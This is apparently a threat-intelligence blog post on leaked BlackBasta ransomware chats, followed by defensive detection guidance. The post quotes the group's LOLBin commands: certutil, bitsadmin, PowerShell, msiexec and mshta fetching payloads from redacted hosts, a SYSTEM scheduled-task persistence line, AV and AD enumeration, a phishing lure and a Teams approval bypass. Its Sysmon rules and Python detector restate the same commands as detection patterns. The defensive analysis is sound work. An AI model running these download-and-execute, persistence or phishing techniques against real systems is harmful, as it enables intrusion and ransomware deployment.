Update to the BlackBasta Post


Like a lot of threat actors, BlackBasta heavily used LOLBins in their attacks. Here are a few examples:

Certutil

certutil -urlcache -split -f https://REDACTED/gm68CGjX C:\Users\Public\payload.exe

WMIC

WMIC /Namespace:\root\SecurityCenter2 Path AntiVirusProduct Get displayName,productState /Format:List

Bitsadmin

bitsadmin /transfer payload https://REDACTED/gKWi39HB C:\Users\Public\malware.exe

Schtasks

schtasks /create /sc onlogon /tn UpdateTask /tr "C:\Users\Public\malware.exe" /ru SYSTEM /f

PowerShell – AD Recon

powershell -c "$D=[System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain();$L='LDAP://'.$D;$D = [ADSI]$L;$Date = $((Get-Date).AddDays(-90).ToFileTime());$str = '(&(objectcategory=computer)(|(lastlogon>='+$Date+')(lastlogontimestamp>='+$Date+')))';$s = [adsisearcher]$str;$s.searchRoot = $L.$D.distinguishedName;$s.PageSize = 10000;$s.PropertiesToLoad.Add('cn') > $Null;Foreach ($CA in $s.FindAll()){;$i++;}; Write-Output Total computers: $i"

PowerShell – Download Malicious DLL

powershell iwr http://REDACTED:801/download/HK_DNS_x64_n1_x64_inf.dll -outfile C:\Users\Public\HK_DNS_x64_n1_x64_inf.dll

MSIExec

msiexec /i https://REDACTED/gH4TzsYk /quiet /qn /norestart

Cscript / Wscript

cscript C:\Users\Public\payload.vbs
wscript C:\Users\Public\payload.vbs

MSHTA

mshta https://REDACTED/g_z3-eZh

Rundll32

rundll32.exe C:\users\public\35S44386.xls,ReleaseImage

RMM Tools

The dataset also mentions the usage of the following RMM tools:
– AnyDesk
– TeamViewer
– Syncro
– Wise RMM
– Tactical RMM
– MeshCentral

Example from the logs:

[text]
Russian “вы какой rmm юзали ? синкро и вайз Сейчас доступ на синкро сохранился”
English “What rmm did you use? syncro and wise Now access to syncro is preserved”
[/text]

Initial Access

Stolen credentials and credential stuffing were discussed, including for RDP, VPN and cPanel.

Phishing with fake data breach notifications:

[text]
“We will use our spam engine, the one we used to infect you in the first place, sending a neat, nicely written message:

Hello, this is Whafh – we are sending a follow up to the recent email on disclosing a data breach (because I am sure you sent one to your clients as you are obligated by the law to do so).
In the attached document, you can see further information about the breach, and an audit of exposure.”
[/text]

MSTeams Social Engineering

[text]

Sending target user MRI TWICE to create a “group chat” in order to bypass “external user message approval” prompt

See https://REDACTED/gjAMU_V4

[/text]

0-Days

The group also mentioned leveraging several of the larger 0-day exploits targeting network devices from the past few months:
– Juniper SRX Firewall Unauthenticated RCE
– SonicPanel RCE
– Palo Alto Networks PAN-OS 0-day CVE-2024-3400 back in April. They were offering a working exploit for 15k.

What Undercode Says

The BlackBasta group’s use of LOLBins (Living Off the Land Binaries) highlights the importance of monitoring legitimate system tools for malicious activity. Certutil, WMIC, Bitsadmin, and PowerShell are routinely abused by attackers to download payloads, execute commands, and perform reconnaissance. Defenders should focus on detecting anomalous usage of these tools, such as Certutil being used to download files from external URLs or PowerShell executing unusual scripts, rather than on the mere presence of the binaries, which are also part of everyday administration.

For Linux defenders, similar techniques can be detected using tools like `auditd` to monitor command-line activity; the `-k` key tags the resulting events so they can be pulled back with `ausearch -k suspicious_commands`:

auditctl -a always,exit -F arch=b64 -S execve -k suspicious_commands

Windows defenders can use Sysmon (Event ID 1, process creation) to track LOLBin usage. A `contains` match on the bare binary name is deliberately broad and will also catch legitimate administrative use, so treat these events as triage input rather than as alerts on their own. The rule group below is shown inside the minimal configuration wrapper Sysmon expects:

<Sysmon schemaversion="4.50">
  <EventFiltering>
    <RuleGroup name="" groupRelation="or">
      <ProcessCreate onmatch="include">
        <CommandLine condition="contains">certutil</CommandLine>
        <CommandLine condition="contains">bitsadmin</CommandLine>
        <CommandLine condition="contains">powershell</CommandLine>
      </ProcessCreate>
    </RuleGroup>
  </EventFiltering>
</Sysmon>
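As an added example (not code from the original post or from the BlackBasta dataset), the following Python script applies the narrower heuristics described above to process-creation command lines. Instead of matching any occurrence of "certutil" or "powershell", it flags the specific argument shapes seen in the commands quoted earlier: certutil -urlcache with a URL, bitsadmin /transfer, schtasks creating a SYSTEM or logon task, PowerShell web downloads or [adsisearcher] enumeration, mshta or msiexec given a URL, script hosts run from Users\Public, and rundll32 loading a non-DLL extension. The event records, rule names and the "REDACTED" hosts are constructed for the example; in practice the records would come from a Sysmon Event ID 1 or EDR export.

```python
"""Flag LOLBin command lines that match the abuse shapes quoted in the post.

Added example; not code from the original post or the BlackBasta dataset.
Input records mimic Sysmon Event ID 1 (process creation) exported as dicts;
SAMPLE_EVENTS below is constructed for this example.
"""
import re
from collections import defaultdict
from dataclasses import dataclass

# (rule name, pattern applied to the lower-cased command line, analyst-facing reason).
# Each pattern requires the suspicious argument shape, not just the binary name,
# so routine administrative use (certutil -hashfile, schtasks /query, ...) stays quiet.
RULES = [
    ("certutil_urlcache_download", re.compile(r"\bcertutil(\.exe)?\b.*-urlcache\b.*\bhttps?://"),
     "certutil used as a downloader"),
    ("bitsadmin_transfer", re.compile(r"\bbitsadmin(\.exe)?\b.*/transfer\b.*\bhttps?://"),
     "BITS job pulling a remote file"),
    ("schtasks_system_logon", re.compile(r"\bschtasks(\.exe)?\b.*/create\b.*(/ru\s+system|/sc\s+onlogon)"),
     "persistence task running as SYSTEM or at logon"),
    ("powershell_download", re.compile(r"\bpowershell(\.exe)?\b.*\b(iwr|invoke-webrequest|downloadfile|downloadstring)\b"),
     "PowerShell web download"),
    ("powershell_adsisearcher", re.compile(r"\bpowershell(\.exe)?\b.*\[adsisearcher\]"),
     "LDAP enumeration from PowerShell"),
    ("msiexec_remote_package", re.compile(r"\bmsiexec(\.exe)?\b.*/i\s+https?://"),
     "MSI package installed from a URL"),
    ("mshta_remote", re.compile(r"\bmshta(\.exe)?\b.*\bhttps?://"),
     "mshta fetching a remote HTA"),
    ("wmic_av_enum", re.compile(r"\bwmic(\.exe)?\b.*securitycenter2.*antivirusproduct"),
     "AV product enumeration via WMI"),
    ("script_host_public_dir", re.compile(r"\b[cw]script(\.exe)?\b.*\\users\\public\\"),
     "script host run from Users\\Public"),
    ("rundll32_non_dll", re.compile(r"\brundll32(\.exe)?\s+[^\s,]+\.(xls|xlsx|txt|dat|png|jpg|log|tmp),"),
     "rundll32 loading a file with a non-DLL extension"),
]

# Constructed records reusing the command shapes quoted in the post; "REDACTED"
# hosts are placeholders exactly as they appear there.
SAMPLE_EVENTS = [
    {"EventId": "mal-01", "CommandLine": r"certutil -urlcache -split -f https://REDACTED/gm68CGjX C:\Users\Public\payload.exe"},
    {"EventId": "mal-02", "CommandLine": r"WMIC /Namespace:\root\SecurityCenter2 Path AntiVirusProduct Get displayName,productState /Format:List"},
    {"EventId": "mal-03", "CommandLine": r"bitsadmin /transfer payload https://REDACTED/gKWi39HB C:\Users\Public\malware.exe"},
    {"EventId": "mal-04", "CommandLine": r'schtasks /create /sc onlogon /tn UpdateTask /tr "C:\Users\Public\malware.exe" /ru SYSTEM /f'},
    {"EventId": "mal-05", "CommandLine": 'powershell -c "$s=[adsisearcher]\'(objectcategory=computer)\';$s.PageSize=10000"'},
    {"EventId": "mal-06", "CommandLine": r"powershell iwr http://REDACTED:801/download/HK_DNS_x64_n1_x64_inf.dll -outfile C:\Users\Public\HK_DNS_x64_n1_x64_inf.dll"},
    {"EventId": "mal-07", "CommandLine": r"msiexec /i https://REDACTED/gH4TzsYk /quiet /qn /norestart"},
    {"EventId": "mal-08", "CommandLine": r"cscript C:\Users\Public\payload.vbs"},
    {"EventId": "mal-09", "CommandLine": r"mshta https://REDACTED/g_z3-eZh"},
    {"EventId": "mal-10", "CommandLine": r"rundll32.exe C:\users\public\35S44386.xls,ReleaseImage"},
    # Benign administrative use of the same binaries: should produce no findings.
    {"EventId": "ok-01", "CommandLine": r"certutil -hashfile C:\Windows\System32\notepad.exe SHA256"},
    {"EventId": "ok-02", "CommandLine": r"schtasks /query /fo LIST /v"},
    {"EventId": "ok-03", "CommandLine": r"powershell.exe -NoProfile -Command Get-Service wuauserv"},
    {"EventId": "ok-04", "CommandLine": r"rundll32.exe shell32.dll,Control_RunDLL"},
    {"EventId": "ok-05", "CommandLine": r"wmic os get Caption"},
]


@dataclass(frozen=True)
class Finding:
    event_id: str
    rule: str
    reason: str
    command_line: str


def scan(events):
    """Return one Finding per (event, rule) pair whose pattern matches the command line."""
    findings = []
    for ev in events:
        cmd = ev["CommandLine"].lower()  # case-insensitive: WMIC, Wmic, wmic all match
        for name, pattern, reason in RULES:
            if pattern.search(cmd):
                findings.append(Finding(ev["EventId"], name, reason, ev["CommandLine"]))
    return findings


def summarize(findings):
    """Map rule name -> sorted event ids, a compact view for triage."""
    by_rule = defaultdict(set)
    for f in findings:
        by_rule[f.rule].add(f.event_id)
    return {rule: sorted(ids) for rule, ids in by_rule.items()}


if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"[{f.event_id}] {f.rule}: {f.reason}\n    {f.command_line}")
```

Run as-is, the script reports exactly one finding for each of the ten quoted command shapes and nothing for the five benign lines. The patterns are a starting point: tune the extension list for rundll32, the download cmdlets for PowerShell and the directory for the script-host rule to what is normal in your own environment.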

For RMM tools, ensure that only authorized software is installed and monitor for unusual remote connections. Use firewall rules to restrict access to RMM tools from untrusted IPs.

Phishing remains a significant threat. Implement email filtering solutions and educate users on identifying suspicious emails. For MSTeams, enforce strict policies for external communication and monitor for unusual group chat creation.

Finally, patch management is critical to mitigate 0-day exploits. Regularly update network devices and apply vendor patches as soon as they are released. Use intrusion detection systems (IDS) to monitor for exploit attempts:

suricata -c /etc/suricata/suricata.yaml -i eth0

Stay vigilant and continuously update your defenses to counter evolving threats.
